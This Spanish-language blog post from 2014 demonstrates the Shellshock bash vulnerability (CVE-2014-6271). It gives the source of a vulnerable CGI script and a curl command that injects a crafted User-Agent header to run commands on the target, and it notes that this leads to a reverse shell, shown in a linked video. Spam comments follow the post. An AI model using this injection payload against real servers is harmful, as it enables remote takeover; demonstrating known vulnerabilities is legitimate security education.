jueves, 2 de octubre de 2014

Video Demo Shellshock Exploit (CVE-2014-6271)

Demo de "Shellshock", la más reciente vulnerabilidad en el shell BASH que afecta a miles y miles de sistemas basados en Linux y UNIX. 

Aprovechando la vulnerabilidad Shellshock es posible generar un "reverse shell" para tomar control remoto de la víctima.

PoC:

1. Se tiene un CGI vulnerable. Por ejemplo: http://198.168.1.1/cgi-bin/victim.cgi

2. Código del CGI vulnerable:

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>Demo Shellshock Exploit (CVE-2014-6271)</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0

3. En el equipo de cómputo del atacante ejecutar:

curl -A "() { foo;};echo;/bin/echo vulnerable" http://192.168.1.1/cgi-bin/victim.cgi

Si la ejecución del comando es exitosa y se tiene la salida "vulnerable", se valida la vulnerabilidad con lo cual es posible inyectar y ejecutar comandos en la víctima. Por ejemplo para obtener un "reverse shell".

El siguiente videoxploit detalla la forma de obtener un "reverse shell" aprovechando Shellshock.

https://www.youtube.com/watch?v=a6FmnUSEkKM 


9 comentarios:

  1. I was more than happy to uncover this great site. I need to to thank you for your time due to this fantastic read!! I definitely enjoyed every bit of it and I have you bookmarked to see new information on your blog.
    Smartsurveys4u

    ResponderEliminar
  2. thanks sir
    https://tourmypakistan.com.pk/accommodation/eden-hotel-naran/?adults=1&kids=0&rooms=1&date_from&date_to&child_ages%5B0%5D=0

    ResponderEliminar
  3. Such a nice piece of information. This post has summed up of all the interesting things in a perfect way & in a single Blog. Asan Bazaar

    ResponderEliminar
  4. Stay connected with your TM SIM—register now in a few easy steps! Click here for a simple registration guide.Globe SIM Registration

    ResponderEliminar
  5. PSA Appointment Online provides a simple way to schedule appointments for civil documents, ensuring faster service.
    PSA Appointment Online for schedule

    ResponderEliminar
  6. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  7. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  8. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  9. here is The Philippine Statistics Authority Appointment System
    click to book your appointment The Philippine Statistics Authority Appointment System

    ResponderEliminar